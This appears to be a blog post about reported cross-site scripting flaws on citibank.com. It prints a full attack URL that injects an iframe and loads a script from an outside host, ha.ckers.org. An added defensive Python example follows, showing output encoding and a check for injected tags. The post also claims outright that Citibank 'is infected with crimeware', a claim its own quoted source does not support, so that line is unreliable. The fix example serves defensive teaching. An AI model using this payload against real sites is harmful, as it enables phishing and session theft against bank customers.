Citibank is not safe – new vulnerabilities

Recent news from xssed.com revealed new vulnerabilities at Citibank, which counts as one of the world's major banks.

What is the actual problem?

Because of the new XSS vulnerabilities, it is very easy for phishers to display a Citibank phishing page until their victim's session cookie expires or gets deleted.

Citibank.com XSS, with the following link displayed in the browser window:
http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=
“/><iframesrc=http://google.com></iframe><scriptsrc=http://ha.ckers.org/xss.js?/>
&_products=NNNNNNNNNNNNNNNNN&_ll=&_mid=&_dta=&_m=0&_cn=&_j=
&_jcontext=/US&_jfp=false&BVE=https://web.da-us.citibank.com&BVP=/cgi-bin/citifi/scripts/
&BV_UseBVCookie=yes
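
The `"/>` at the start of the `_profile` value suggests the parameter is echoed into an HTML attribute without output encoding. The following is an added example, not code from xssed.com or Citibank: it renders a constructed request both ways and checks the result for elements the template never defined. The hidden-field template, the `.invalid` host names and all function names are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request modelled on the link above; hosts replaced with .invalid names.
SAMPLE_URL = ('http://bank.example.invalid/domain/contact/index.htm?_u=visitor'
              '&_profile="/><iframe src=http://example.invalid></iframe>&_m=0')

# Assumed sink: the page echoes _profile into a hidden form field.
TEMPLATE = '<form><input type="hidden" name="_profile" value="{}"/></form>'
EXPECTED_TAGS = {"form", "input"}


def profile_param(url):
    """Return the decoded _profile query parameter ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("_profile", [""])[0]


def render_vulnerable(url):
    """Reflect the parameter verbatim, so a quote ends the attribute early."""
    return TEMPLATE.format(profile_param(url))


def render_hardened(url):
    """Encode &, <, > and both quote characters before reflecting the value."""
    return TEMPLATE.format(escape(profile_param(url), quote=True))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(markup):
    """Return elements in the rendered page that the template never defines."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return [t for t in collector.tags if t not in EXPECTED_TAGS]


if __name__ == "__main__":
    print("vulnerable:", injected_tags(render_vulnerable(SAMPLE_URL)))
    print("hardened:  ", injected_tags(render_hardened(SAMPLE_URL)))
```

The same `injected_tags` check can run in a regression test against any page that reflects request parameters.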


As discovered, Citibank is infected with crimeware. For those who don't know about crimeware:

Crimeware is a class of malware designed specifically to automate financial crime. It also often has the intent to export confidential or sensitive information from a network for financial exploitation. Crimeware can enable remote access into applications, allowing hackers to break into networks for malicious purposes. It can surreptitiously install keystroke loggers to collect sensitive data (login and password information for online bank accounts).

Our source reveals that “Both flaws can be exploited by malicious people to conduct phishing attacks with a higher success rate and to infect Citibank’s clients with crimeware.”

~shout~
“Could someone inform the authority of citibank to fix this bug”

